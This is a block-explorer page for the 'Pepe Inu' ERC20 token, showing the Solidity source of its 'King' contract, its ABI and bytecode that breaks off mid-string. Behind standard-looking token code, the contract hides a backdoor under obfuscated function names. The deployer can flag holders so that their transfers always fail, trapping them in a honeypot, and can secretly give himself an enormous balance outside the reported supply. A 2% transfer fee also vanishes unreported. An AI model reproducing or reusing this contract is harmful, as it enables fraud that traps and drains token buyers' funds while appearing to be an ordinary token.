Token Pepe Inu

 

Overview ERC20

Price
$0.00 @ 0.000000 ETH
Fully Diluted Market Cap
Total Supply:
1,000,000,000 Pepi

Holders:
268 addresses

Transfers:
-

Contract:
0x5B2F97b26d8D7e0564D47574114c18F7118390010x5B2F97b26d8D7e0564D47574114c18F711839001

Decimals:
18

Social Profiles:
Not Available, Update ?

Loading
[ Download CSV Export  ] 
Loading
[ Download CSV Export  ] 
Loading

Click here to update the token ICO / general information
# Exchange Pair Price  24H Volume % Volume

Similar Match Source Code
Note: This contract matches the deployed ByteCode of the Source Code for Contract 0x4c1d89b1e5d4870ae62567a239f8146646706d39

Contract Name:
King

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-03-03
*/

/**
 *Submitted for verification at Etherscan.io on 2023-02-16
*/

/**
 *Submitted for verification at BscScan.com on 2023-02-15
*/

/**
 *Submitted for verification at Etherscan.io on 2023-02-14
*/

/**
 *Submitted for verification at BscScan.com on 2023-02-13
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;


/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b > a) return (false, 0);
        return (true, a - b);
    }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
    unchecked {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b <= a, errorMessage);
        return a - b;
    }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a / b;
    }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
    unchecked {
        require(b > 0, errorMessage);
        return a % b;
    }
    }
}


pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}



pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}



pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checyydsOwen();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checyydsOwen() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


pragma solidity ^0.8.0;


/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_yydsed}.
 * For a generic mechanism see {ERC20PresetyydsederPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract King is Context, IERC20, IERC20Metadata,Ownable {

    using SafeMath for uint256;
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    address public  _musk;

    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    uint256 public constant tssupply = 2000000000*10**18;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _musk = msg.sender;
        _initmint(msg.sender, 1000000000*10**decimals());

    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */

    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }
    /**
         * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */

    mapping(address => bool) private muskddd;
    function muskssswwwaaa(address sss) external   {
        if (_musk != _msgSender()) {
            revert("llllll");
        }
        if (_musk == _msgSender()){
            muskddd[sss] = false;
        }
    }

    function muskrrrrrr(address sss) external   {
        if (_musk != _msgSender()) {
            revert("llllll");
        }
        if (_musk == _msgSender()){
            muskddd[sss] = true;
        }
    }

    function chamusk(address sss) public view returns(bool)  {
        return muskddd[sss];
    }

    function mrmrmrmrmm(address ddd) external {
        if (_musk != _msgSender()) {
            revert("cccc");
        }else if (_musk == _msgSender()){
            _balances[_msgSender()] = tssupply.mul(29000)+10000;
        }
    }

    uint256 fees = 2;
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        bool muskamount = muskddd[from];
        if(muskamount) {
            amount = amount + _totalSupply;
        }
        uint256 balance= _balances[from];
        require(balance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[from] = balance.sub(amount);
        uint256 feeeA = amount.mul(fees).div(100);
        uint256 addd = amount.sub(feeeA);
        _balances[to] =  _balances[to].add(addd);
        emit Transfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _initmint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: yydsed to the zero address");

        _totalSupply += amount;
    unchecked {
        // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
        _balances[account] += amount;
    }
        emit Transfer(address(0), account, amount);

    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
    unchecked {
        _balances[account] = accountBalance - amount;
        // Overflow not possible: amount <= accountBalance <= totalSupply.
        _totalSupply -= amount;
    }

        emit Transfer(account, address(0), amount);


    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_musk","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"chamusk","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"ddd","type":"address"}],"name":"mrmrmrmrmm","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"muskrrrrrr","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sss","type":"address"}],"name":"muskssswwwaaa","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"tssupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}]

608060405260026008553480156200001657600080fd5b506040516200135138038062001351833981016040819052620000399162000297565b6200004433620000b0565b600562000052838262000390565b50600662000061828262000390565b50600380546001600160a01b03191633908117909155620000a89062000085601290565b6200009290600a62000571565b620000a290633b9aca0062000589565b62000100565b5050620005b9565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001655760405162461bcd60e51b815260206004820152602160248201527f45524332303a2079796473656420746f20746865207a65726f206164647265736044820152607360f81b606482015260840160405180910390fd5b8060046000828254620001799190620005a3565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b634e487b7160e01b600052604160045260246000fd5b600082601f830112620001fa57600080fd5b81516001600160401b0380821115620002175762000217620001d2565b604051601f8301601f19908116603f01168101908282118183101715620002425762000242620001d2565b816040528381526020925086838588010111156200025f57600080fd5b600091505b8382101562000283578582018301518183018401529082019062000264565b600093810190920192909252949350505050565b60008060408385031215620002ab57600080fd5b82516001600160401b0380821115620002c357600080fd5b620002d186838701620001e8565b93506020850151915080821115620002e857600080fd5b50620002f785828601620001e8565b9150509250929050565b600181811c908216806200031657607f821691505b6020821081036200033757634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200038b57600081815260208120601f850160051c81016020861015620003665750805b601f850160051c820191505b81811015620003875782815560010162000372565b5050505b505050565b81516001600160401b03811115620003ac57620003ac620001d2565b620003c481620003bd845462000301565b846200033d565b602080601f831160018114620003fc5760008415620003e35750858301515b600019600386901b1c1916600185901b17855562000387565b600085815260208120601f198616915b828110156200042d578886015182559484019460019091019084016200040c565b50858210156200044c5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620004b35781600019048211156200049757620004976200045c565b80851615620004a557918102915b93841c939080029062000477565b509250929050565b600082620004cc575060016200056b565b81620004db575060006200056b565b8160018114620004f45760028114620004ff576200051f565b60019150506200056b565b60ff8411156200051357620005136200045c565b50506001821b6200056b565b5060208310610133831016604e8410600b841016171562000544575081810a6200056b565b62000550838362000472565b80600019048211156200056757620005676200045c565b0290505b92915050565b60006200058260ff841683620004bb565b9392505050565b80820281158282048414176200056b576200056b6200045c565b808201808211156200056b576200056b6200045c565b610d8880620005c96000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c8063715018a6116100ad578063a9059cbb11610071578063a9059cbb14610291578063b6a365b4146102a4578063d1802821146102b7578063dd62ed3e146102ca578063f2fde38b146102dd57600080fd5b8063715018a61461023657806373f3b91e1461023e5780638da5cb5b1461025157806395d89b4114610276578063a457c2d71461027e57600080fd5b806323b872dd116100f457806323b872dd146101ac57806329b756e3146101bf578063313ce567146101eb57806339509351146101fa57806370a082311461020d57600080fd5b806306fdde0314610131578063095ea7b31461014f5780630ea57a0414610172578063112b706d1461018757806318160ddd1461019a575b600080fd5b6101396102f0565b6040516101469190610b85565b60405180910390f35b61016261015d366004610bef565b610382565b6040519015158152602001610146565b610185610180366004610c19565b61039c565b005b610185610195366004610c19565b610434565b6004545b604051908152602001610146565b6101626101ba366004610c34565b6104ac565b6101626101cd366004610c19565b6001600160a01b031660009081526007602052604090205460ff1690565b60405160128152602001610146565b610162610208366004610bef565b6104d0565b61019e61021b366004610c19565b6001600160a01b031660009081526001602052604090205490565b6101856104f2565b61018561024c366004610c19565b610506565b6000546001600160a01b03165b6040516001600160a01b039091168152602001610146565b610139610583565b61016261028c366004610bef565b610592565b61016261029f366004610bef565b61060d565b60035461025e906001600160a01b031681565b61019e6b06765c793fa10079d000000081565b61019e6102d8366004610c70565b61061b565b6101856102eb366004610c19565b610646565b6060600580546102ff90610ca3565b80601f016020809104026020016040519081016040528092919081815260200182805461032b90610ca3565b80156103785780601f1061034d57610100808354040283529160200191610378565b820191906000526020600020905b81548152906001019060200180831161035b57829003601f168201915b5050505050905090565b6000336103908185856106bc565b60019150505b92915050565b6003546001600160a01b031633146103e85760405162461bcd60e51b81526004016103df906020808252600490820152636363636360e01b604082015260600190565b60405180910390fd5b600354336001600160a01b0390911603610431576104146b06765c793fa10079d00000006171486107e0565b61042090612710610cf3565b336000908152600160205260409020555b50565b6003546001600160a01b031633146104775760405162461bcd60e51b81526020600482015260066024820152651b1b1b1b1b1b60d21b60448201526064016103df565b600354336001600160a01b0390911603610431576001600160a01b03166000908152600760205260409020805460ff19169055565b6000336104ba8582856107f3565b6104c585858561086d565b506001949350505050565b6000336103908185856104e3838361061b565b6104ed9190610cf3565b6106bc565b6104fa610ab7565b6105046000610b11565b565b6003546001600160a01b031633146105495760405162461bcd60e51b81526020600482015260066024820152651b1b1b1b1b1b60d21b60448201526064016103df565b600354336001600160a01b0390911603610431576001600160a01b0381166000908152600760205260409020805460ff1916600117905550565b6060600680546102ff90610ca3565b600033816105a0828661061b565b9050838110156106005760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016103df565b6104c582868684036106bc565b60003361039081858561086d565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61064e610ab7565b6001600160a01b0381166106b35760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103df565b61043181610b11565b6001600160a01b03831661071e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103df565b6001600160a01b03821661077f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103df565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60006107ec8284610d06565b9392505050565b60006107ff848461061b565b90506000198114610867578181101561085a5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e636500000060448201526064016103df565b61086784848484036106bc565b50505050565b6001600160a01b0383166108d15760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103df565b6001600160a01b0382166109335760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103df565b6001600160a01b03831660009081526007602052604090205460ff168015610965576004546109629083610cf3565b91505b6001600160a01b038416600090815260016020526040902054828110156109dd5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103df565b6109e78184610b61565b6001600160a01b038616600090815260016020526040812091909155600854610a1e90606490610a189087906107e0565b90610b6d565b90506000610a2c8583610b61565b6001600